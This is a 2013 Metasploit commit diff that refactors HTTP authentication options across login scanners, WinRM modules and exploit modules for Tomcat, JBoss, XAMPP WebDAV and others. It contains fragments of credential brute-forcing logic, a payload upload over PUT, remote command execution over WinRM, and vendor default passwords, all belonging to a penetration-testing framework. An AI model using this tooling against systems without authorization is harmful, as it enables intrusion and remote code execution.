last of revert-merge snaffu

2013-02-19 23:16:46 -06:00 · 2013-02-19 23:16:46 -06:00 · 0ae489b37b
parent 6abbbeb3ca
commit 0ae489b37b
17 changed files with 52 additions and 239 deletions
--- a/modules/auxiliary/gather/shodan_search.rb
+++ b/modules/auxiliary/gather/shodan_search.rb
@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
 		))

 		# disabling all the unnecessary options that someone might set to break our query
-		deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN',
+		deregister_options('RPORT','RHOST', 'DOMAIN',
 			'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
 			'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
-			'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL')
+			'NTLM::UseNTLMv2','SSL')

 		register_options(
 			[
--- a/modules/auxiliary/scanner/http/cisco_device_manager.rb
+++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'           => 'Cisco Device HTTP Device Manager Access',
 			'Description'    => %q{
 					This module gathers data from a Cisco device (router or switch) with the device manager
-				web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
+				web interface exposed. The USERNAME and PASSWORD options can be used to specify
 				authentication.
 			},
 			'Author'		=> [ 'hdm' ],
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_good("#{rhost}:#{rport} Successfully authenticated to this device")

 			# Report a vulnerability only if no password was specified
-			if datastore['BasicAuthPass'].to_s.length == 0
+			if datastore['PASSWORD'].to_s.length == 0

 				report_vuln(
 					{
--- a/modules/auxiliary/scanner/http/http_login.rb
+++ b/modules/auxiliary/scanner/http/http_login.rb
@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
 		register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
 	end

-	def find_auth_uri_and_scheme
+	def find_auth_uri

-		path_and_scheme = []
 		if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
 			paths = [datastore['AUTH_URI']]
 		else
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
 				next if not res
 			end

-			next if not res.code == 401
-			next if not res.headers['WWW-Authenticate']
-			path_and_scheme << path
-			case res.headers['WWW-Authenticate']
-			when /Basic/i
-				path_and_scheme << "Basic"
-			when /NTLM/i
-				path_and_scheme << "NTLM"
-			when /Digest/i
-				path_and_scheme << "Digest"
-			end
-			return path_and_scheme
+			return path
 		end

-		return path_and_scheme
+		return path
 	end

 	def target_url
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_error("You need need to set AUTH_URI when using PUT Method !")
 			return
 		end
-		@uri, @scheme = find_auth_uri_and_scheme()
+		@uri = find_auth_uri
 		if ! @uri
 			print_error("#{target_url} No URI found that asks for HTTP authentication")
 			return
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary

 		@uri = "/#{@uri}" if @uri[0,1] != "/"

-		if ! @scheme
-			print_error("#{target_url} Incompatible authentication scheme")
-			return
-		end
-
-		print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
+		print_status("Attempting to login to #{target_url}")

 		each_user_pass { |user, pass|
 			do_login(user, pass)
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary

 	def do_login(user='admin', pass='admin')
 		vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
-		success = false
-		proof   = ""
-
-		ret  = do_http_login(user,pass,@scheme)
-		return :abort if ret == :abort
-		if ret == :success
-			proof   = @proof.dup
-			success = true
-		end
-
-		if success
+		
+		response  = do_http_login(user,pass)
+		result = determine_result(response)
+		
+		if result == :success
 			print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")

 			any_user = false
 			any_pass = false

 			vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
-			any_user  = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme)
+			any_user  =  determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))

 			vprint_status("#{target_url} - Trying username:'#{user}' with random password")
-			any_pass  = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme)
+			any_pass  = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))

 			if any_user == :success
 				user = "anyuser"
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
 				:sname => (ssl ? 'https' : 'http'),
 				:user   => user,
 				:pass   => pass,
-				:proof  => "WEBAPP=\"Generic\", PROOF=#{proof}",
+				:proof  => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
 				:source_type => "user_supplied",
 				:active => true
 			)
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
 		end
 	end

-	def do_http_login(user,pass,scheme)
-		case scheme
-		when /NTLM/i
-			do_http_auth_ntlm(user,pass)
-		when /Digest/i
-			do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
-		when /Basic/i
-			do_http_auth_basic(user,pass)
-		else
-			vprint_error("#{target_url}: Unknown authentication scheme")
-			return :abort
-		end
-	end
-
-	def do_http_auth_ntlm(user,pass)
+	def do_http_login(user,pass)
 		begin
-			resp,c = send_http_auth_ntlm(
+			response = send_request_cgi({
 				'uri' => @uri,
+				'method' => datastore['REQUESTTYPE'],
 				'username' => user,
 				'password' => pass
-			)
-			c.close
-			return :abort if (resp.code == 404)
-
-			if [200, 301, 302].include?(resp.code)
-				@proof   = resp
-				return :success
-			end
-
+			})
+			return response
 		rescue ::Rex::ConnectionError
 			vprint_error("#{target_url} - Failed to connect to the web server")
-			return :abort
+			return nil
 		end
-
-		return :fail
 	end

-	def do_http_auth_basic(user,pass)
-		user_pass = Rex::Text.encode_base64(user + ":" + pass)
-
-		begin
-			res = send_request_cgi({
-				'uri'     => @uri,
-				'method'  => 'GET',
-				'headers' =>
-					{
-						'Authorization' => "Basic #{user_pass}",
-					}
-				}, 25)
-
-			unless (res.kind_of? Rex::Proto::Http::Response)
-				vprint_error("#{target_url} not responding")
-				return :abort
-			end
-
-			return :abort if (res.code == 404)
-
-			if [200, 301, 302].include?(res.code)
-				@proof   = res
-				return :success
-			end
-
-		rescue ::Rex::ConnectionError
-			vprint_error("#{target_url} - Failed to connect to the web server")
-			return :abort
-		end
-
-		return :fail
-	end
-
-	def do_http_auth_digest(user,pass,requesttype)
-		path = datastore['AUTH_URI'] || "/"
-		begin
-			if requesttype == "PUT"
-				res,c = send_digest_request_cgi({
-					'uri'     => path,
-					'method'  => requesttype,
-					'data'	=> 'Test123\r\n',
-					#'DigestAuthIIS' => false,
-					'DigestAuthUser' => user,
-					'DigestAuthPassword' => pass
-				}, 25)
-			elsif requesttype == "PROPFIND"
-				res,c = send_digest_request_cgi({
-					'uri'     => path,
-					'method'  => requesttype,
-					'data'	=> '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
-					#'DigestAuthIIS' => false,
-					'DigestAuthUser' => user,
-					'DigestAuthPassword' => pass,
-					'headers' => { 'Depth' => '0'}
-				}, 25)
-			else
-				res,c = send_digest_request_cgi({
-					'uri'     => path,
-					'method'  => requesttype,
-					#'DigestAuthIIS' => false,
-					'DigestAuthUser' => user,
-					'DigestAuthPassword' => pass
-				}, 25)
-			end
-
-			unless (res.kind_of? Rex::Proto::Http::Response)
-				vprint_error("#{target_url} not responding")
-				return :abort
-			end
-
-			return :abort if (res.code == 404)
-
-			if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
-				if ((res.code == 201) and (requesttype == "PUT"))
-					print_good("Trying to delete #{path}")
-					del_res,c = send_digest_request_cgi({
-						'uri' => path,
-						'method' => 'DELETE',
-						'DigestAuthUser' => user,
-						'DigestAuthPassword' => pass
-						}, 25)
-					if not (del_res.code == 204)
-						print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
-					end
-				end
-				@proof   = res
-				return :success
-			end
-
-			if (res.code == 207) and (requesttype == "PROPFIND")
-				@proof   = res
-				return :success
-			end
-
-		rescue ::Rex::ConnectionError
-			vprint_error("#{target_url} - Failed to connect to the web server")
-			return :abort
-		end
-
+	def determine_result(response)
+		return :abort unless response.kind_of? Rex::Proto::Http::Response
+		return :abort unless response.code
+		return :success if [200, 301, 302].include?(response.code)
 		return :fail
 	end

--- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
+++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
 		vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
 		success = false
 		srvhdr = '?'
-		user_pass = Rex::Text.encode_base64(user + ":" + pass)
 		uri = normalize_uri(datastore['URI'])
 		begin
 			res = send_request_cgi({
 				'uri'     => uri,
 				'method'  => 'GET',
-				'headers' =>
-					{
-						'Authorization' => "Basic #{user_pass}",
-					}
+				'username' => user,
+				'password' => pass
 				}, 25)
 			unless (res.kind_of? Rex::Proto::Http::Response)
 				vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary


 	def run_host(ip)
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM  server  (#{ip} does not appear to allow Negotiate(NTLM) auth"
-			return
-		end
 		streams = winrm_run_cmd(datastore['CMD'])
 		return unless streams.class == Hash
 		print_error streams['stderr'] unless streams['stderr'] == ''
--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary


 	def run_host(ip)
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM  server  (#{ip} does not appear to allow Negotiate(NTLM) auth"
-			return
-		end
 		each_user_pass do |user, pass|
-			resp,c = send_request_ntlm(test_request)
+			resp = send_winrm_request(test_request)
 			if resp.nil?
 				print_error "#{ip}:#{rport}:  Got no reply from the server, connection may have timed out"
 				return
--- a/modules/auxiliary/scanner/winrm/winrm_wql.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb
@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary


 	def run_host(ip)
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM  server  (#{ip} does not appear to allow Negotiate(NTLM) auth"
-			return
-		end
-
-		resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
+		resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
 		if resp.nil?
 			print_error "Got no reply from the server"
 			return
--- a/modules/auxiliary/server/http_ntlmrelay.rb
+++ b/modules/auxiliary/server/http_ntlmrelay.rb
@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
 							'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
 		], self.class)

-		deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword',
-			'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
+		deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
 			'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
 	end

--- a/modules/exploits/linux/http/piranha_passwd_exec.rb
+++ b/modules/exploits/linux/http/piranha_passwd_exec.rb
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote

 		register_options(
 			[
-				OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
-				OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
+				OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
+				OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
 			], self.class)
 	end

@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end

 		if res.code == 401
-			print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
+			print_error("401 Authorization Required! Our Credentials not accepted!")
 		elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
 			print_status("Command successfully executed (according to the server).")
 		end
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							authmsg = res.headers['WWW-Authenticate']
 						end
 						print_error("The remote server responded expecting authentication")
-						if datastore['BasicAuthUser'] and datastore['BasicAuthPass']
-							print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
-						elsif authmsg
+						if authmsg
 							print_error("WWW-Authenticate: %s" % authmsg)
 						end
 						cleanup_instructions(rpath, name) # display cleanup info
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-		datastore['BasicAuthUser']	= datastore['USERNAME']
-		datastore['BasicAuthPass']	= datastore['PASSWORD']
-
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-		datastore['BasicAuthUser'] = datastore['USERNAME']
-		datastore['BasicAuthPass'] = datastore['PASSWORD']
-
 		jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
 		app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def check
-		datastore['BasicAuthUser'] = datastore['USERNAME']
-		datastore['BasicAuthPass'] = datastore['PASSWORD']
-
 		res = query_serverinfo
 		disconnect
 		return CheckCode::Unknown if res.nil?
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			:host   => rhost,
 			:port   => rport,
 			:sname  => (ssl ? "https" : "http"),
-			:user   => datastore['BasicAuthUser'],
-			:pass   => datastore['BasicAuthPass'],
+			:user   => datastore['USERNAME'],
+			:pass   => datastore['PASSWORD'],
 			:proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
 			:active => true
 		)
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-		datastore['BasicAuthUser'] = datastore['USERNAME']
-		datastore['BasicAuthPass'] = datastore['PASSWORD']
-
 		mytarget = target
 		if (target.name =~ /Automatic/)
 			mytarget = auto_target
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			:host   => rhost,
 			:port   => rport,
 			:sname  => (ssl ? "https" : "http"),
-			:user   => datastore['BasicAuthUser'],
-			:pass   => datastore['BasicAuthPass'],
+			:user   => datastore['USERNAME'],
+			:pass   => datastore['PASSWORD'],
 			:proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
 			:active => true
 		)
--- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
+++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def go(command)
-		datastore['BasicAuthUser'] = datastore['USERNAME']
-		datastore['BasicAuthPass'] = datastore['PASSWORD']
-
 		xml = <<-EOS
 <?xml version="1.0"?>
 <methodCall>
--- a/modules/exploits/windows/http/easyftp_list.rb
+++ b/modules/exploits/windows/http/easyftp_list.rb
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				Opt::RPORT(8080),
-				OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
-				OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
+				OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
+				OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
 			], self.class)
 	end

--- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb
+++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				OptString.new('PATH', [ true,  "The path to attempt to upload", '/webdav/']),
 				OptString.new('FILENAME', [ false ,  "The filename to give the payload. (Leave Blank for Random)"]),
-				OptString.new('RUSER', [ true,  "The Username to use for Authentication", 'wampp']),
-				OptString.new('RPASS', [ true,  "The Password to use for Authentication", 'xampp'])
+				OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
+				OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', 'xampp'])
 			], self.class)
 	end

@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		uri = build_path
 		print_status "Uploading Payload to #{uri}"
-		res,c = send_digest_request_cgi({
+		res = send_request_cgi({
 					'uri'     => uri,
 					'method'  => 'PUT',
 					'data'	=> payload.raw,
-					'DigestAuthUser' => datastore['RUSER'],
-					'DigestAuthPassword' => datastore['RPASS']
+					'username' => datastore['USERNAME'],
+					'password' => datastore['PASSWORD']
 				}, 25)
 		unless (res and res.code == 201)
 			print_error "Failed to upload file!"
--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		@compat_mode = false
 	end

-	def check
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
-			return Msf::Exploit::CheckCode::Safe
-		end
-
-		return Msf::Exploit::CheckCode::Vulnerable
-	end
-
-
 	def exploit
-		unless  check == Msf::Exploit::CheckCode::Vulnerable
-			return
-		end
 		unless valid_login?
 			print_error "Login Failure. Recheck your credentials"
 			return
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote

 	def temp_dir
 		print_status "Grabbing %TEMP%"
-		resp,c = send_request_ntlm(winrm_open_shell_msg)
+		resp = send_winrm_request(winrm_open_shell_msg)
 		if resp.nil?
 			print_error "Got no reply from the server"
 			return nil
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		shell_id = winrm_get_shell_id(resp)
 		cmd = "echo %TEMP%"
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
+		resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
 		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
+		resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
 		streams = winrm_get_cmd_streams(resp)
 		return streams['stdout'].chomp
 	end

 	def check_remote_arch
 		wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
-		resp,c = send_request_ntlm(winrm_wql_msg(wql))
+		resp = send_winrm_request(winrm_wql_msg(wql))
 		#Default to x86 if we can't be sure
 		return "x86" if resp.nil? or resp.code != 200
 		resp_tbl = parse_wql_response(resp)
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote

 	def valid_login?
 		data = winrm_wql_msg("Select Name,Status from Win32_Service")
-		resp,c = send_request_ntlm(data)
+		resp = send_winrm_request(data)
 		unless resp.code == 200
 			return false
 		end